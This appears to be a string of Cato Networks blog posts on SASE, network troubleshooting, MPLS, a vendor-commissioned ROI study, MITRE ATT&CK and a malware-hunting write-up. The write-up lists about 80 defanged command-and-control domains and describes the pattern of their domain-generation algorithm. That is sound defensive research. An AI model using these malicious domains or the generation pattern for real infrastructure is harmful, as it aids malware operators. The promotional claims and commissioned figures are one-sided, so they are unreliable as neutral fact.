The growing number of network and security requirements has flooded the market with vendors and point solutions. IT and security teams are having a difficult time figuring out which platform can answer their exact needs, both now and in the future. In addition, integrating and managing all these solutions creates time-consuming complexities and overhead.
SASE is being adopted as a single, user-friendly converged solution for all network and security needs, now and in the future. With a single console for configuration, management and reporting - visibility and management capabilities are improved. In addition, implementing one security solution enables enforcing a single set of policies across the entire network and reducing the attack surface.
4. Adopting Zero Trust
Zero trust is a security model in which users are continuously authenticated before they are given access to assets or apps. It is based on the premise of “never trust, always verify”, to ensure the principle of least privilege is enforced and attackers can’t gain access to sensitive assets. Zero trust is essential for securing a global, dispersed workforce that connects remotely and not from the physical, enterprise network.
The mindset of IT and security teams is shifting, from securing physical locations to connecting and securing users and devices. Zero trust is deployed as part of SASE as a solution to access needs. By using simple mobile client software or clientless browser access, users connect dynamically to the closest SASE PoP, where their traffic is routed optimally to the data center or application. There, it is authenticated before providing access.
Check out the full ebook to view the entire list and four additional SASE drivers.
The Future of Enterprise Networks
Agile solutions that provide secure, global access with high performance are driving global digital transformation. It is becoming evident, however, that point solutions can't meet all the enterprise needs. These changes are driving the adoption of SASE, a convergence of network and security functions that drives traffic through a global network of local PoPs.
With SASE, traffic is sent to the local SASE PoP. Once traffic enters the PoP, SASE applies network and security policies and forwards it over an optimized, global, private backbone. The SASE cloud service takes care of delivering and managing a comprehensive security stack, including upgrades and security updates, for all connected users and cloud resources.
The result is optimized, secure and high performing traffic that drives business agility.
CATO Networks is Driving SASE Globally
Cato pioneered the convergence of networking and security into the cloud. Aligned with Gartner's Secure Access Service Edge (SASE) framework, Cato's vision is to deliver a next generation secure networking architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches based on disjointed point solutions. With Cato, organizations securely and optimally connect any user to any application anywhere on the globe. Our cloud-first architecture enables Cato to rapidly deploy new capabilities and maintain optimum security posture, without any effort from the IT teams. With Cato, your IT organization and your business are ready for whatever comes next.
See the ebook “8 SASE Drivers for Modern Enterprises”.
One of the more frustrating aspects of more users working from home, and remote connectivity in general, is that troubleshooting often requires user involvement at...
Making Site Support a Bit Easier. Meet the Diagnostic Toolbox in Your Cato Socket One of the more frustrating aspects of more users working from home, and remote connectivity in general, is that troubleshooting often requires user involvement at a really bad time. Users are complaining about connection issues, and just when they're frustrated, you need them to be patient enough to walk through them the troubleshooting steps needed to diagnose the problem. Wouldn’t it have been better if you had tools already in place before a problem occurs? Then you could run your testing without involving the user.
Well, now you do. We’ve added an IT toolbox to our Cato Socket, Cato’s SD-WAN device. Embedded in the Socket Web UI is a single interface through which network administrators can test and troubleshoot remote connectivity without involving the end-user. Ping, Traceroute, Speedtest, and iPerf are already available, instantly, through a common interface and without any user involvement.
[caption id="attachment_23495" align="alignnone" width="1699"] The IT toolbox within the Cato Socket UI provides a range of tools for IT to diagnose last-mile connections from a single web interface[/caption]
[boxlink link="https://www.catonetworks.com/resources/socket-short-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=short_socket_demo"] Cato Demo: From Legacy to SASE in Under 2 Minutes With Cato Sockets [/boxlink]
Of course, those are not the only troubleshooting tools provided in Cato SASE Cloud. Cato was built from the philosophy that network troubleshooting is a team sport. While Cato Networks engineers maintain the Cato private backbone for 99.999% uptime, Cato users can manage and run the network themselves. They don’t have to open support tickets for changes they can just as easily address independently. Cato provides the tools for doing just that.
Numerous dashboards report on packet loss, latency, jitter, and real-time status help IT diagnose problems once users are connected to Cato.
[caption id="attachment_23497" align="alignnone" width="2113"] Cato includes dynamic dashboards reports on last-mile packet loss, latency, jitter, throughput and more for upstream and downstream connections.[/caption]
Our event discovery capability provides any IT team with advanced research and analytics tools to query a data warehouse that we curate and maintain. It organizes more than 100 types of security, connectivity, system, routing, and Socket management events into a single timeline that can be easily queried. Complex queries can be easily built by selecting from the types and sub-types of events to compare the test data being collected via tool access using Socket Web UI against what has previously occurred on that network connection.
[caption id="attachment_23499" align="alignnone" width="1920"] With Events, Cato converges networking and security events into a single timeline, simplifying the troubleshooting process.[/caption]
Remote troubleshooting has always been a challenge for IT. With remote offices and more users working from home that challenge will only grow. Having the diagnostic tools in place before problems occur goes a long way to improving IT satisfaction.
The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology...
5 Strategic Projects for Strategic CIOs The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging technology, can transform their organization.
Let’s look at five strategic projects that can help CIOs drive innovation and generate new revenue streams.
Project #1: Migrating MPLS or SD-WAN to SASE
Many organizations have replaced their MPLS with SD-WAN, or are in the process of doing so. SD-WAN emerged a few decades ago as a cost-effective replacement to MPLS, because it answers MPLS constraints like capacity, cost and lack of flexibility. However, SD-WAN does not provide solutions for modern requirements like security threats, remote work, global performance and cloud-native scalability.
SASE (Secure Access Service Edge) is the next step after SD-WAN. A Gartner-coined term, SASE is the convergence of SD-WAN, network security and additional IT capabilities into a global, cloud-native platform. Compared to SD-WAN and other point solutions, SASE ensures reliability, performance, security and connectivity.
In fact, according to Gartner’s Hype Cycle of Network Security 2020 - by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How CIOs Create Business Value with SASE:
By migrating to SASE, CIOs ensure all employees will always be able to connect via a secure, global and performance optimized network. With SASE, CIOs are also relieved from the complexity and risk of supporting the business with point solutions, which are often outdated.
Project #2: Building Cloud Native Connectivity
Cloud-native infrastructure, platforms and applications provide businesses with flexibility, scalability and customizability. They also increase the speed and efficiency of processes.
Technological advancements have enabled this transition, but it is the growing need for remote accessibility and global connectivity that is accelerating it. On-premises solutions can no longer answer modern business needs for performing business activities.
SASE is a cloud-native technology, providing businesses with all the benefits of the cloud and connecting all edges, branches, users and data centers.
How CIOs Create Business Value with Cloud Native Connectivity
By building cloud native connectivity across all edges, CIOs provide employees with optimized performance, security and accessibility to any required internal or external business application. Cloud readiness also enables agile delivery to customers.
[boxlink link="https://www.catonetworks.com/resources/deploy-your-site-in-under-6-minutes/?utm_source=blog&utm_medium=top_cta&utm_campaign=6_minute_demo"] Deploy your site in under 6 minutes with Cato SASE Cloud! | Check it out [/boxlink]
Project #3: Implementing a Full Security Stack in the Cloud
Cyber attacks are becoming increasingly more sophisticated, widespread and with the potential to create more destruction. Coupled with the dissolvement of network borders, IT and security teams need to rethink their security strategy and solutions.
Existing point security solutions simply cannot keep up with all these changes. In addition, the overhead tax IT and security teams pay for finding, purchasing, managing, integrating and updating various security solutions from numerous vendors is very high.
A converged security solution implements innovative security models, like ZTNA (Zero Trust Network Access) alongside security measures like threat prevention and decryption. In addition, it is automatically updated, to ensure it can thwart CVEs and zero day threats.
How CIOs Provide Business Value with Full Stack Cloud Security
By implementing a complete security stack in the cloud, CIOs provide the company’s employees and customers with the confidence that their information is secure and accessible only to authorized users and services. In addition, IT and security teams regain peace of mind to operate with confidence and stress free.
Project #4: Enable Access to All Edges
Working remotely from home, the road or a different office is becoming increasingly popular, and is turning into a working model that is here to stay. In addition, the global distribution of networks has also introduced many new entry points to business systems. But, traditional access capabilities are not designed for these types of connectivity models.
SASE provides dynamic and secure access through global PoPs (Points of Presence). Traffic from remote users, data centers, applications or other edges is automatically detected and sent to the nearest PoP. There, it is authorized and then given access.
How CIOs Provide Business Value with Global Access to All Edges
By providing users with secure access while ensuring first-class citizen performance, CIOs become enablers for business agility and speedy deliveries. The freedom and flexibility to work from anywhere and connect to anywhere power new opportunities for business initiatives. In addition, they provide employees with working conditions fit for modern life and ensure they will not look elsewhere for an employer that enables working remotely.
5. Optimize Routing with Global Connectivity
Businesses today route high volumes of traffic, from globally dispersed employees and other edges. Performance optimization is essential for connectivity and communication so employees can get things done. However, the Internet is too erratic to be relied on, and SD-WAN providers are forced to integrate with third party backbone providers for such optimization.
SASE solutions provide a global backbone and WAN optimization, serving IT and security capabilities to all users and accelerating east-west and northbound traffic to the cloud.
How CIOs Provide Business Value with Optimized Global Connectivity
By ensuring low latency and optimized routing, CIOs are fulfilling a key requirement for business agility. From video streaming to accessing information to transferring data, optimized routing facilitates and powers business activities.
How to Get Started
Looking at this list might be daunting at first. However, all these projects can be achieved through the implementation of SASE. SASE converges network and security point solutions into a single, global, cloud-native platform that enables access from all edges. Therefore, it provides a single and streamlined answer to all network and security needs, now and in the future.
Cato is the world’s first SASE platform. Using the Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
You can read more from the following resources:
Your First 100 Days as CIO: 5 Steps to Success
5 Things SASE Covers that SD-WAN Doesn’t
What is SASE?
The Hybrid Workforce: Planning for the New Working Reality
During a recent malware hunt[1], the Cato research team identified some unique attributes of DGA algorithms that can help security teams automatically spot malware on...
The DGA Algorithm Used by Dealply and Bujo Campaigns During a recent malware hunt[1], the Cato research team identified some unique attributes of DGA algorithms that can help security teams automatically spot malware on their network.
The “Shimmy” DGA
DGAs (Domain Generator Algorithms) are used by attackers to generate a large number of – you guessed it – domains often used for C&C servers. Spotting DGAs can be difficult without a clear, searchable pattern.
Cato researchers began by collecting traffic metadata from malicious Chrome extensions to their C&C services. Cato maintains a data warehouse built from the metadata of all traffic flows crossing its global private backbone. We analyze those flows for suspicious traffic to hunt threats on a daily basis.
The researchers were able to identify the same traffic patterns and network behavior in traffic originating from 80 different malicious Chrome extensions, which were identified as from the Bujo, Dealply and ManageX families of malicious extensions. By examining the C&C domains, researchers observed an algorithm used to create the malicious domains. In many cases, DGAs appear as random characters. In some cases, the domains contain numbers, and in other cases the domains are very long, making them look suspicious.
Here are a few examples of the C&C domains (full domain list at the end of this post):
qalus.com
jurokotu.com
bunafo.com
naqodur.com
womohu.com
bosojojo.com
mucac.com
kuqotaj.com
bunupoj.com
pocakaqu.com
wuqah.com
dubocoso.com
sanaju.com
lufacam.com
cajato.com
qunadap.com
dagaju.com
fupoj.com
The most obvious trait the domains have in common is that they are all part of “.com” TLD (Top-Level Domain). Also, all the prefixes are five to eight letters long.
There are other factors shared by the domains. For one, they all start with consonants and then create a pattern that is built out of consonants and vowels; so that every domain is represented by consonant + vowel + consonant + vowel + consonant, etc. As an example, in jurokotu.com domain, removing the TLD will bring “jurokotu”, and coloring the word to consonants (red) and vowels (blue) will show the pattern: “jurokotu”.
From the domains we collected, we could see that the adversaries used the vowels: o, u and a, and consonants: q, m, s, p, r, j, k, l, w, b, c, n, d, f, t, h, and g. Clearly, an algorithm has been used to create these domains and the intention was to make them look as close to real words as possible.
[boxlink link="https://www.catonetworks.com/resources/8-ways-sase-answers-your-current-and-future-it-security-needs/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_ways_sase_answers_needs_ebook"] 8 Ways SASE Answers Your Current and Future Security & IT Needs [eBook] [/boxlink]
“Shimmy” DGA infrastructure
A few additional notable findings are related to the same common infrastructure used by all the C&C domains.
All domains are registered using the same registrar - Gal Communication (CommuniGal) Ltd. (GalComm), which was previously associated with registration of malicious domains [2].
The domains are also classified as ‘uncategorized’ by classification engines, another sign that these domains are being used by malware. Trying to access the domains via browser, will either get you a landing page or HTTP ERROR 403 (Forbidden). However, we believe that there are server controls that allow access to the malicious extensions based on specific http headers.
All domains are translated to IP addresses belonging to Amazon AWS, part of AS16509. The domains do not share the same IP, and from time to time it seems that the IP for a particular domain is changed dynamically, as can be seen in this example:
tawuhoju.com
13.224.161.119
14/04/2021
tawuhoju.com
13.224.161.119
15/04/2021
tawuhoju.com
13.224.161.22
23/04/2021
tawuhoju.com
13.224.161.22
24/04/2021
Wrapping Up
Given all this evidence, it’s clear to us that the infrastructure used on these campaigns is leveraging AWS and that it is a very large campaign. We identified many connection points between 80 C&C domains, identifying their DGA and infrastructure. This could be used to identify the C&C communication and infected machines, by analyzing network traffic. Security teams can now use these insights to identify the traffic from malicious Chrome extensions.
IOC
bacugo[.]com
bagoj[.]com
baguhoh[.]com
bosojojo[.]com
bowocofa[.]com
buduguh[.]com
bujot[.]com
bunafo[.]com
bunupoj[.]com
cagodobo[.]com
cajato[.]com
copamu[.]com
cusupuh[.]com
dafucah[.]com
dagaju[.]com
dapowar[.]com
dubahu[.]com
dubocoso[.]com
dudujutu[.]com
focuquc[.]com
fogow[.]com
fokosul[.]com
fupoj[.]com
fusog[.]com
fuwof[.]com
gapaqaw[.]com
garuq[.]com
gufado[.]com
hamohuhu[.]com
hodafoc[.]com
hoqunuja[.]com
huful[.]com
jagufu[.]com
jurokotu[.]com
juwakaha[.]com
kocunolu[.]com
kogarowa[.]com
kohaguk[.]com
kuqotaj[.]com
kuquc[.]com
lohoqoco[.]com
loruwo[.]com
lufacam[.]com
luhatufa[.]com
mocujo[.]com
moqolan[.]com
muqudu[.]com
naqodur[.]com
nokutu[.]com
nopobuq[.]com
nopuwa[.]com
norugu[.]com
nosahof[.]com
nuqudop[.]com
nusojog[.]com
pocakaqu[.]com
ponojuju[.]com
powuwuqa[.]com
pudacasa[.]com
pupahaqo[.]com
qaloqum[.]com
qotun[.]com
qufobuh[.]com
qunadap[.]com
qurajoca[.]com
qusonujo[.]com
rokuq[.]com
ruboja[.]com
sanaju[.]com
sarolosa[.]com
supamajo[.]com
tafasajo[.]com
tawuhoju[.]com
tocopada[.]com
tudoq[.]com
turasawa[.]com
womohu[.]com
wujop[.]com
wunab[.]com
wuqah[.]com
References:
[1] https://www.catonetworks.com/blog/threat-intelligence-feeds-and-endpoint-protection-systems-fail-to-detect-24-malicious-chrome-extensions/
[2] https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/
Last week the United Kingdom’s National Cyber Security Centre (NCSC) urged UK organizations “to strengthen their cyber resilience in response to the situation in Ukraine”...
February 24, 2022
5m read
Cato Networks Response to UK’s NCSC Guidance On Tightening Cyber Control Due to the Situation in Ukraine Last week the United Kingdom’s National Cyber Security Centre (NCSC) urged UK organizations “to strengthen their cyber resilience in response to the situation in Ukraine” [1] and today they followed that warning up with a call for “organisations in the UK to bolster their online defences” [2] by adopting a set of “Actions to take when the cyber threat is heightened.”[3] Similar statements have been issued by other authorities such as Germany’s Federal Office for Information Security (BSI) and CISA in the US.
As a global provider of the converged network and security solutions known as SASE (Secure Access Service Edge) [4], Cato Networks has a rapidly expanding portfolio of customers not just here in the UK but in many other regions around the world which are also exposed to the current situation. Here are some suggestions for Cato customers who wish to enhance their security posture in accordance with the NCSC’s advice.
Step 1 - Lock administrative access down.
Cato’s true single-pane-of-glass management console makes it easy for organisations to understand and control exactly who can make changes to their Cato SASE environment. Customers can use the built-in Events Discovery (effectively, your own SIEM running inside Cato) to easily filter for admin users which haven’t recently logged on, and then disable them. Admin user MFA should be enabled across the board and any administrators who don’t make changes (such as auditors) given viewer accounts only.
This is also a good opportunity to review API keys and revoke any which are no longer required.
Step 2 - Review SDP user account usage.
Now is also the right time to review SDP users for stale user accounts which can be disabled or deleted, ensure that directory synchronisation and SCIM groups are appropriately configured and filter all manually created SDP users for unexpected third party users. Customers should also check that any user-specific configuration settings which override global policy are there for good reasons and do not expose the organisation to increased risk.
[boxlink link="https://www.catonetworks.com/resources/inside-cato-networks-advanced-security-services/?utm_source=blog&utm_medium=top_cta&utm_campaign=inside_cato_advanced_security_services"] Inside Cato Networks Advanced Security Services | Find Out [/boxlink]
Step 3 - Tighten access controls.
Cato provides a wide range of access control features including Device Authentication, Device Posture (currently EA), MFA, SSO, operating system blocking and Always-On connectivity policy. Customers should ensure that they are taking advantage of the tight access control capable with Cato by implementing as many of these features as possible and minimising user-based exceptions to the global policy.
Step 4 - Implement strong firewalling.
As true Next-Generation Firewalls which are both identity-aware and application-aware, Cato’s WAN Firewall and Internet Firewall allow our customers to create fine-grained control over all network traffic across the WAN and to the Internet from all Cato sites and mobile users. The seamless integration of a Secure Web Gateway with the firewalls further increases the degree of control which can be applied to Internet traffic.
Both firewalls should be enabled with a final “block all” rule. Customers should also inspect the remaining rules for suitability, and engage Cato Professional Services to assist with a comprehensive firewall review.
Step 5 - Start logging everything.
One of the main benefits of cloud-based security solutions is that unlike on-premise appliances which are constrained by hardware, the elasticity built into the cloud allows for seamless real-time scaling up of features such as logging. Cato customers can take advantage of our cloud-native elasticity to enable flow-level logging for all traffic across their environment, and then use the built-in SIEM and analytics dashboards to derive real intelligence and perform forensics on real-time and historic data.
Step 6 - Enable TLS inspection.
Another feature made possible by the cloud is ubiquitous inspection of TLS inspection regardless of source location or destination. Cato SASE automatically detects TLS traffic on non-standard ports and can be controlled by fine-grained policies to avoid disrupting traffic to known good destinations and to comply with local regulations regarding sensitive traffic decryption.
Step 7 - Enable Enhanced Threat Protection (IPS, Anti Malware, NG Anti Malware).
Even organisations who are not directly in the line of state-sponsored fire are exposed to the usual risk of compromise by ransomware gangs and other actors of economic motivation. Cato’s Enhanced Threat Protection services – IPS, Anti Malware and Next-Gen Anti Malware – are specifically designed to complement the base level firewalls and Secure Web Gateway by inspecting the traffic which is allowed through for suspicious and malicious content. Customers who don’t currently have these features should ask their account management team to enable an immediate trial. Customers with these features should ensure that TLS inspection is enabled and engage Cato Professional Services to ensure that the feature are properly configured and tuned for maximum efficacy.
Step 8 – 24x7 Detection and Response.
During a recent interview [5] regarding a high-profile hack which occurred on his watch, a CISO stated that “no time is a good time, but these things never come during the middle of the day, during the work week.” Customers without a 24x7 incident response capability should carefully consider their options for being able to detect and respond to threats outside of normal working hours. Cato’s Managed Detection and Response (MDR) service can help customers who are unable to stand up their own 24x7 MDR capability.
The NCSC article referred to above includes many other suggestions which are automatically covered by Cato, such as device patching, log retention and configuration backup. The main concern for organisations who already have Cato is to make the best use of what they’ve already got. They no longer need to worry gaps in their security posture, because Cato has those covered out of the box. If you’re not a Cato customer and you’d like to find out more about our solution, or you’re an existing customer who wants to find out more about the additional products and services we provide, let's talk.
References:
[1] https://twitter.com/NCSC/status/1493256978277228550
[2] https://www.ncsc.gov.uk/news/organisations-urged-to-bolster-defences
[3] https://www.ncsc.gov.uk/guidance/actions-to-take-when-the-cyber-threat-is-heightened
[4] https://www.catonetworks.com/sase/sase-according-to-gartner/
[5] https://risky.biz/HF15/
MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses...
February 22, 2022
4m read
Pros and Cons of MPLS: Is It Right for Your Network? MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next.
What is MPLS?
MPLS (Multiprotocol Label Switching) is a network routing technique that is based on predetermined paths, instead of routers determining the next hop in real-time. This enables quicker and more efficient routing, as the router only needs to view a packet label, instead of looking up the address destination in complex routing tables. In addition, using MPLS requires setting up a dedicated connection. It is de facto a private network.
How does MPLS Work?
In MPLS, when a data packet enters the network, it is assigned a data label by the first router in the path. The label predetermines the path the packet needs to follow. It includes a value, as well as additional fields to determine the quality of service required, the position of the label in the stack and time-to-live. Based on this label, the packet is routed to the next router in its path.
The second router that receives the packet then reads this label and uses it to determine the following hop in the network. It also removes the existing label from the packet and adds a new one. This process is repeated until the data packet reaches its destination. The last router in the path removes the label from the data packet.
Since the path is predetermined, the routers only need to read the label and do not need to check the packet’s IP address. This enables faster and more efficient routing.
MPLS routing terms:
Label Edge Router (LER) - the first or last routers that either assign the first data label and determine the path or pop the label off the packet. The first router is also known as Ingress Label Switching Router (Ingress LSR) and the last as Egress LSR.Label Switching Router (LSR) - the routers along the path that read the labels, switch them and determine the next hop for the packets.Label Switching Path (LSP) - the path the packets are routed through in the network
Now let’s look at the advantages and disadvantages of MPLS routing.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | Find Out [/boxlink]
MPLS Advantages & Benefits
MPLS provides multiple advantages to network administrators and businesses. These include:
Reliability
Routing based on labels over a private network ensures that packets will be reliably delivered to their destination. In addition, MPLS enables prioritizing traffic for different types of packets, for example routing real-time, video packets through a lower latency path. This reliability is guaranteed through service level agreements (SLAs), which also ensure the MPLS provider will resolve outages or pay a penalty.
High Performance
MPLS dedicated infrastructure assures high-quality, low latency and low jitter performance. This ensures efficiency and a good user experience. It is also essential for real-time communication, like voice, video and mission-critical information.
MPLS Disadvantages
However, there are also disadvantages to MPLS.
Expensive
MPLS services are expensive, due to their commitment to ensure high bandwidth, high performance and competitive SLAs. Deployments and upgrades of the required private connection can also turn into a resource-intensive process.
Rigid
MPLS is built for point-to-point connectivity, and not for the cloud. Therefore, the WAN does not have a centralized operations center for reconfiguring locations or deploying new ones and does not enable quick scalability.
Does Not Support All Edges
MPLS cannot be extended to the cloud since it requires its own dedicated infrastructure. Therefore, it is not a good fit for remote users or for connecting to SaaS applications.
Conclusion
MPLS is a trustworthy solution for legacy applications in enterprises. However, the transition to the cloud and remote work require businesses to reconsider their network strategy and implement more cost-effective and efficient solutions. Alternatives like SASE (Secure Access Service Edge) combine all the advantages of MPLS, SD-WAN and more.
To learn more about SASE and to see how it improves your MPLS connectivity, contact us.
Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity,...
February 15, 2022
5m read
Total Economic Impact™Study: Cato Delivers 246% ROI and $4.33 Million NPV Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud–native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams.
The question is - are we living up to our goals?
To help us and our potential customers gauge the potential impact and ROI of Cato Networks, we commissioned Forrester Consulting to conduct a Total Economic Impact (TEI) study. To be completely honest, even we were blown away by the success these companies achieved through the Cato SASE Cloud.
The study shows how Cato Networks is helping reduce costs, eliminate overhead, retire old systems, enhance security, improve performance and create higher employee morale.
Some of the key findings Forrester found, were that by using Cato, a composite organization can enjoy:
246% ROI
$4.33 million NPV
Payback in less than 6 months
$3.8 million saved on reduced operation and maintenance
Almost $44,000 saved on reduced time to configure Cato on new sites
$2.2 million saved by retiring systems that Cato replaces
Reduced time and transit cost
Security consistency
And more
This matters because today organizations are struggling with managing security and network services. They have dedicated teams for VPN, internet and WAN, and more, which need to individually manage updates at each network site. This is time-consuming and costly. In the long run, this prevents the business from transforming digitally, maintaining a competitive advantage and delivering the best services they can to their customers.
Let’s dive into some more of these key findings.
[boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] The Total Economic Impact™ of Cato Networks | Read The Full Report [/boxlink]
Reduced Operation and Maintenance Costs
The study revealed that Cato Networks enables saving $3.8 million in reduced operation and maintenance costs over three years. This objective is extremely important for multiple organization stakeholders, as network and security engineers spend a lot of time managing systems instead of optimizing them.
“Honestly, I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [the previous solution], you need 10 engineers to set it up and 20 engineers to keep it running. With Cato, this all went away. It’s in the dashboard. Within the hour, you understand the idea behind it and then you can just do it.”
- IT manager, motor vehicle parts manufacturer
Reduced Configuration Time
With companies scaling and requiring flexibility to connect employees and customers from anywhere, setup and configuration time has become an important consideration when choosing a network and security solution. According to the study, Cato Network saves nearly $44,000 and a huge number of manual hours over three years.
“The other thing that we were driving towards was, because we do mergers, because we do a lot of office moves, [because] we go into different geographies, I wanted an ‘office in a box,’ fire- and-forget sort of management plane separation approach where my team could do a lot with just shipping a box out [and] having a reasonably intelligent individual follow a diagram, plug it in, have it light up in a management portal, and we're in business.”
- Director of technology, advisory, tax and assurance
Savings From Retired Systems
Expensive hardware is a huge pain for IT and security teams. It requires maintenance, upgrades, fixes and integrations with other platforms. By migrating to SASE and retiring old systems, organizations can save $2.2 million dollars with Cato, over three years.
“We don’t need to go invest in those other solutions because the Cato transport with the intelligence and the security layer does everything we need it to do.”
- Director of technology, advisory, tax and assurance
Additional Benefits
According to the report, Cato Networks also provides additional, unquantifiable benefits, like:
Reduced time and transit costs -Saving time and money transporting the equipment to remote sites.
Increased security posture - By ensuring the consistency of security rule sets across the organization.
Better application performance - Enabling practitioners to get their work done faster.
Higher employee morale - According to a director of technology, advisory, tax and assurance: “I know that if I tried to roll it back in my firm, [the employees] would revolt because of the speed it gets. My engineers love it because you ship it, we’ll configure it, it shows up, and we’re off to the races.”
Flexibility - The ability to add new mobile users without the need to add infrastructure and to deploy sites quickly.
Read the Complete Report
You’re welcome to read the complete report to dive deeper into how businesses can digitally transform with Cato Networks. It has all the financial information, more quotes and use cases, and a breakdown of costs and savings to help you gain a more in-depth understanding of Cato Network’s business impact. Read the complete TEI report.
To speak with an expert about how you can achieve such ROI in your company, contact us.
As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact...
February 13, 2022
6m read
Why Cato Uses MITRE ATT&CK (And Why You Should Too) As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and letting them be one step ahead.
With the traditional IoC-based approach, the assumption is that whenever adversaries use some specific exploit it will generate some specific data. It could be an HTTP request, a domain name, a known malicious IP, and the like. By looking at information from sources such as application logs, network traffic, and HTTP requests enterprises can detect these IoCs and stop adversaries from compromising their networks.
In 2020 there were about 18,000 new CVEs reported and in 2021 there were about 20,000, as this trend continues the number of IoCs that are discovered becomes unmanageable and many of them can be modified in small ways to avoid detection. What’s more, as we will show in this blogpost, IoCs are not even the full security picture, representing a small portion of the attacks confronting enterprises. All of which suggests that security professionals need to expand their methods of detecting and stopping attacks.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help [eBook] [/boxlink]
TTPs: The New Approach to Detecting Attacks
The security community has noticed this trend and has started shifting from IoC-based detection to understanding adversaries’ Tactics, Techniques, and Procedures (TTPs). Having identified TTPs, security vendors can then develop the necessary defenses to mitigate risk.
Many tools have been developed to help understand and map these TTPs, one such tool is MITRE’s ATT&CK Framework.
ATT&CK is a collaborative effort involving many security vendors and researchers. The project aims to map adversary TTPs to help create a common language for both red and blue teams.
ATT&CK contains a few different matrices, each with its own sector. In the enterprise matrix, which is focus of our work, there are 14 “tactics.” A “tactic” is a general goal that the adversary is trying to accomplish, under each tactic there are several “techniques.” A “technique” is the means the adversary uses to accomplish his tactic, it is a more technical categorization of what the adversary may do to implement his tactic. Each technique can appear under multiple tactics and can be further divided into sub-techniques. Some tactics can be seen across the network with Reconnaissance, Initial Access, Execution, and Exfiltration associated with the network’s perimeter.
To better understand the value of ATT&CK, look at “The Pyramid of Pain,” which shows the relationship between the types of indicators you might use to detect an adversary's activities and how hard it will be for them to change them once caught. TTPs being the hardest to change thus causing more pain to the adversary if detected.
[caption id="attachment_22591" align="alignnone" width="2080"] This diagram shows us in a simple manner why aiming to identify TTPs can be more beneficial and improve defenses against adversaries rather than those focusing on IoCs.[/caption]
As enterprises shift from reactive and IoC-based security, which heavily relies on processing IoCs from threat intelligence feeds, to TTP-based security, which requires a proactive approach based on research, enterprise security becomes more challenging. At the same time, TTP-based security brings numerous benefits. These include better visibility into one’s security posture, better understanding of security risks, and an improved understanding of how to expand security capabilities to better defend against real adversaries.
Cato Implements MITRE ATT&CK
Cato has implemented the MITRE ATT&CK methodology of identifying and protecting against TTPs on top of the traditional IoCs. We incorporated this ability into our product by implementing a tagging system that tags each security event with the relevant ATT&CK tactics, techniques, and sub-techniques. This allows customers to visualize and understand what threats they face and what attack flows they are vulnerable to, further enabling them to understand where to improve their insight, and what TTPs their adversaries are using.
[caption id="attachment_22593" align="alignnone" width="1358"] A view of an event that is mapped to ATT&CK in the Cato Cloud[/caption]
So, what did implementing a TTP-based approach reveal to us?
As we dove into the details of our signatures, we saw that we could divide them into two main approaches:
IoC-based - Covering a specific vulnerability using well-defined IoCs.
TTP-based - Covering a behavior of an adversary.
We started by looking at our products’ coverage over the entire ATT&CK matrix and trying to understand where we are most vigilant and where we are less so. Our scope was the most common threats we cover (in our customers’ networks), and new threats we covered from the last year.
After going through this process and creating a visualization of our threat protection with the ATT&CK Navigator, we found that Cato Cloud provides protection across all stages of the attack flow with particular strengths in the Initial Access and Execution stages.
[caption id="attachment_22595" align="alignnone" width="2708"] Cato’s protection capabilities mapped onto the ATT&CK matrix. The darker the color, the more vulnerabilities Cato protects against in that technique. (For simplicity, sub-techniques are not shown.)[/caption]
We should not be satisfied with this data alone, while signature numbers and mappings are an insightful metric, the real insights should be derived from events in the field. So, we then examined Cato’s defenses based on the actual events of exploitation attempts in each ATT&CK technique. Our sampling looked at a two-week period spanning some 1,000 networks.
[caption id="attachment_22597" align="alignnone" width="2928"] Cato’s security events mapped onto the ATT&CK Matrix. Again, the darker the color the more events found to be using that technique in the last two weeks. Sub-techniques are not shown to keep it simple.[/caption]
From this mapping, we can see two things.
Most events are from scanning techniques, this is expected as a single scan can hit many clients with many protocols and generate many events.
We see events from many different techniques and tactics, which means that covering more than just the perimeter of the network does increase security as adversaries can appear in any stage of the attack flow and should never be assumed to exist only in the perimeter.
Putting aside scans, we found that TTP-based signatures identified far more security events than the IoC-based signatures did. Below is a table mapping the percentage of events identified by TTP-based (ATT&CK) and IoC-based approaches over our sampling period. Looking at the table, three techniques represent 87% of all events in the last two weeks. Counting the signatures, we saw that on average 78% of all signatures were IoC-based and only 22% were TTP-based.
